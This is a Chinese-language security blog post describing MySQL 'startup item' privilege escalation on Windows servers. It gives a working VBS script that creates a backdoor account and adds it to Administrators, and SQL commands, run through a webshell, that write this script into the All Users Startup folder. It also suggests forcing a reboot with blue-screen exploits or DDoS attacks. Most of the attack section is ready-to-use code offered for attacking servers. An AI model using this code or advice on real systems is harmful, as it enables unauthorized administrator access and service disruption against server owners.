关于MySQL的启动项提权，听其名知其意。就是将一段 VBS脚本导入到 ?C:\Documents and Settings\All Users\「开始」菜单\程序\启动 下，如果管理员重启了服务器，那么就会自动调用该脚本，并执行其中的用户添加及提权命令！

这里有两种思路：

1. 如果 ?C:\Documents and Settings\All Users\「开始」菜单\程序\启动 目录存在可读写的权限，那么我们可以直接将 VBS 提权脚本上传到该目录下！

VBS 提权脚本代码如下：

set wsnetwork=CreateObject(“WSCRIPT.NETWORK”)
os=”WinNT://”&wsnetwork.ComputerName
Set ob=GetObject(os)
Set oe=GetObject(os&”/Administrators,group”)
Set od=ob.Create(“user”,”secist”)
od.SetPassword “secist.com”
od.SetInfo
Set of=GetObject(os&“/secist”,user)
oe.add os&“/secist”

将以上代码保存为 .vbs 后缀的文件上传即可！

2. 通过大马的MySQL执行功能，利用SQL命令来进行VBS脚本的创建及添加。

create table secist(cmd text);

insert into secist values(“set wshshell=createobject(“”wscript.shell””)”);

insert into secist values(“a=wshshell.run(“”cmd.exe /c net user secist secist.com /add“”,0)”);

insert into secist values(“b=wshshell.run(“”cmd.exe /c net localgroup administrators secist /add“”,0)”);

select * from secist into dumpfile “C:\Documents and Settings\All Users\「开始」菜单\程序\启动\secist.vbs”;

成功执行以上命令后，只要管理员重启了服务器，我们就可以成功提权了！

温馨提示：

1.关于重启目标服务器，我们可以利用一些可导致服务器蓝屏的EXP，或者DDoS拒绝服务！

2.上传的目录必须具备可读写的权限！

3.调用的 cmd 也必须有足够的权限！

转载请注明：即刻安全 » MySQL之启动项提权原理及实现